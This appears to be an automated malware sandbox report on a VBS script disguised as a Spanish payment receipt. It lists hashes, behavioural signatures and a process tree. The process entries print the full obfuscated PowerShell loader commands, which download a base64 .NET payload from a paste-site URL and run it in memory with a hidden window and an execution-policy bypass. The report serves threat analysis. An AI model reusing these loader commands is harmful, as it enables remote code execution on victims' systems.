Analysis
-
max time kernel
30s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
07-08-2022 08:28
Static task
static1
Behavioral task
behavioral1
Sample
DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs
Resource
win7-20220718-en
General
-
Target
DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs
-
Size
205KB
-
MD5
a922f12891bb10b7fa058b7974950de6
-
SHA1
5a7e081ae52a26ebc08b0076493a73afbc58fc9e
-
SHA256
4287a4d23b855bf6ce9ff903998b58468c9dbf03255e486cda93f0115957edbf
-
SHA512
2d6f4865ccbe9b99113d7568aeeb0e6e6250f9cde87227ea5efc5aaee8aa1758679f02c046c6396feece1c9fd5607415403578bec90583ee4e7aa6a08506b5e3
Malware Config
Extracted
https://pasteio.com/download/xc3Ey7lGXuPW
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1732 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1760 powershell.exe 1732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1760 powershell.exe Token: SeDebugPrivilege 1732 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1772 wrote to memory of 1760 1772 WScript.exe powershell.exe PID 1772 wrote to memory of 1760 1772 WScript.exe powershell.exe PID 1772 wrote to memory of 1760 1772 WScript.exe powershell.exe PID 1760 wrote to memory of 1732 1760 powershell.exe powershell.exe PID 1760 wrote to memory of 1732 1760 powershell.exe powershell.exe PID 1760 wrote to memory of 1732 1760 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE8ASQBVAEcAdwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AG⌚⌚⌚AaQBvAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQALwB4AGMAMwBFAHkANwBsAEcAWAB1AFAAVwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHcATgA4AE8AOQBFAGQAOQBxAFAA⌚⌚⌚gB4AC8AZABhAG8AbABuAHcAbwBkAC8AbQBvAGMALgBvAGkAZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⌚⌚⌚gBvAGQAYQBDAG8AcAB5ACAALAAgACcARQA5AE8AOABOAHcAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%OIUGw%', 'C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xc3Ey7lGXuPW'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('wN8O9Ed9qPRx/daolnwod/moc.oietsap//:sptth' , $RodaCopy , 'E9O8Nw' ))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD500d0d7f40247fef8e477f3dcc5777664
SHA19b50d0e1415cdfbbc37ddc2ef86cdcff31e45383
SHA2565c2910083f9eb223bf7ff0b6dd79a8096fad7a87bfde82d74a90dba9f41923df
SHA512661be78aea8541ad645e330c6cb4eb81bd9c58ed6dd500ceaaed8bc88a86dfdb43c29fb8d69f3165ef72d43445e90d11fde787ab029649d34932a50e30bc9de7
-
memory/1732-68-0x00000000024EB000-0x000000000250A000-memory.dmpFilesize
124KB
-
memory/1732-67-0x00000000024E4000-0x00000000024E7000-memory.dmpFilesize
12KB
-
memory/1732-70-0x00000000024EB000-0x000000000250A000-memory.dmpFilesize
124KB
-
memory/1732-69-0x00000000024E4000-0x00000000024E7000-memory.dmpFilesize
12KB
-
memory/1732-65-0x000007FEF2CB0000-0x000007FEF380D000-memory.dmpFilesize
11.4MB
-
memory/1732-61-0x0000000000000000-mapping.dmp
-
memory/1732-64-0x000007FEF3810000-0x000007FEF4233000-memory.dmpFilesize
10.1MB
-
memory/1760-55-0x0000000000000000-mapping.dmp
-
memory/1760-60-0x000000001B7D0000-0x000000001BACF000-memory.dmpFilesize
3.0MB
-
memory/1760-66-0x000000000296B000-0x000000000298A000-memory.dmpFilesize
124KB
-
memory/1760-57-0x000007FEF3810000-0x000007FEF4233000-memory.dmpFilesize
10.1MB
-
memory/1760-58-0x000007FEF2CB0000-0x000007FEF380D000-memory.dmpFilesize
11.4MB
-
memory/1760-59-0x0000000002964000-0x0000000002967000-memory.dmpFilesize
12KB
-
memory/1760-71-0x0000000002964000-0x0000000002967000-memory.dmpFilesize
12KB
-
memory/1760-72-0x000000000296B000-0x000000000298A000-memory.dmpFilesize
124KB
-
memory/1772-54-0x000007FEFBCE1000-0x000007FEFBCE3000-memory.dmpFilesize
8KB